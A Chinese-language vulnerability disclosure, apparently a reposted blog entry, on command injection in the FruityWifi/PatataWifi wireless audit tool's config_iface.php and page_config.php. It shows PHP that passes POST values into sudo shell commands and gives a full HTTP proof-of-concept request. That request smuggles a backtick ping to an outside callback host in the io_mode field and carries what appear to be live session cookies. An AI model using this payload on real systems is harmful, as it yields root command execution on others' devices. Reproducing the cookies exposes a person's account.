shanghai date Coding bit usr ofo 系統 errors new

FruityWIfi是一款有名的無線安全審計的開源工具，其靈感來自於wifipineapple，目前該工具已經更新到2.4。它能夠讓用戶通過web界面來控制和管理模塊，十分方便。FriutyWifi最初的設想是能夠在樹莓派上使用，但是也可以安裝在Debian系列的操作系統上，例如Debian，kali Linux等，甚至可以安裝在NetHunter上，在某些移動設備上使用。 詳細介紹和使用看這裏http://www.freebuf.com/articles/wireless/157559.html

github：https://github.com/PatatasFritas/PatataWifi
issues：https://github.com/PatatasFritas/PatataWifi/issues/1

script/config_iface.php 文件

<?
include_once dirname(__FILE__)."/../config/config.php";
require_once WWWPATH."/includes/login_check.php";
require_once WWWPATH."/includes/filter_getpost.php";
include_once WWWPATH."/includes/functions.php";
// ------------ IN | OUT (START) -------------
if(isset($_POST[‘io_mode‘])){
    $exec = "/bin/sed -i ‘s/io_mode=.*/io_mode=\\\"".$_POST[‘io_mode‘]."\\\";/g‘ ../config/config.php";
    exec_fruitywifi($exec);
}
 

看這裏執行的代碼是通過 exec_fruitywifi 函數執行的，這個函數在 functions.php裏面，如下代碼：

function exec_fruitywifi($exec) {
    $bin_exec = "/usr/bin/sudo";
    exec("$bin_exec sh -c \"$exec\"", $output);
    //exec("$bin_exec sh -c \"$exec\" 2>&1", $output); //DEBUG SHOW ERRORS (da problemas cuando se usa para ejecutar un servicio)
    //LOG
    $rs = fopen(LOGPATH."/exec.log", ‘a‘);
    fwrite($rs, date("Y-m-d H:i:s")." - "."$bin_exec sh -c \"$exec\"\n");
    if(is_array($output) and array_key_exists(0, $output)) {
        fwrite($rs, "\t".$output[0]."\n\n");
    } elseif (is_string($output)) {
        fwrite($rs, "\t".$output."\n\n");
    }
    fclose($rs);
    return $output;
}
 

可以看到使用exec直接拼接執行了代碼。

poc如下：

POST /script/config_iface.php HTTP/1.1
Host: 192.168.8.150
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1305686839.1530540055; _octo=GH1.1.1160558809.1530540055; tz=Asia%2FShanghai; user_session=G3Lilv5ed8uCKk3xwZs5K_qD6izdAtXukNtPndcLr0ShNo8j; __Host-user_session_same_site=G3Lilv5ed8uCKk3xwZs5K_qD6izdAtXukNtPndcLr0ShNo8j; logged_in=yes; dotcom_user=ly55521; has_recent_activity=1; _gh_sess=MWl5N0NXckk5ekF0TTEzQXEwYUZaMVdaOGFDdWVjbitiMTFqNzJXK0piNmpLTlg4OTJRMHVhQUJrVHRVenNlQ09aUnBIaFJyN2JoNmFBZXdJK1ZVMzRqQXRBTjlRZzdSVFcydUIrTWtrMHhnaWUzRjJlQk9yVGpTSkdkcVJncDh3a0tRR0pWVWlMNkw5Q2QxLzY2T3JDbEo2b1FjTm90WHB0MS94bHNJYmNZTHhaYmllNzMySEVDZWxtTUxYNCtKQzlqRjRVWlJvOUJ5cFFKL3RLRGRpak1rdGZva2M5SnVDekt6N1JpSmVpdHVGMy9aMTFJbkk1eDlnUXAvNm5CTTVjS1dqSmlUbHFhTXc4WExyWnZuQTFXcnBpMHA1OEp3VnBGdWlMSWtTWVk9LS1VTDViV1pMeFNMaGxMUE5lWDg5M1FRPT0%3D--ec33e4803fc050592008c1eebd9fb22483774002
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

io_mode=123%26‘%600%26ping%203.t00ls.fc7853eedebcc14a39700d54c9b8acca.tu4.org.%26%60‘

可以收到ping請求。

再看 page_config.php 文件的 82/84行，同樣存在命令執行漏洞。

$hostapd_ssid=$_POST[‘newSSID‘];
exec_fruitywifi("sed -i ‘s/hostapd_ssid=.*/hostapd_ssid=\\\"".$_POST[‘newSSID‘]."\\\";/g‘ ./config/config.php");

無線安全審計工具FruityWifi 多處命令執行漏洞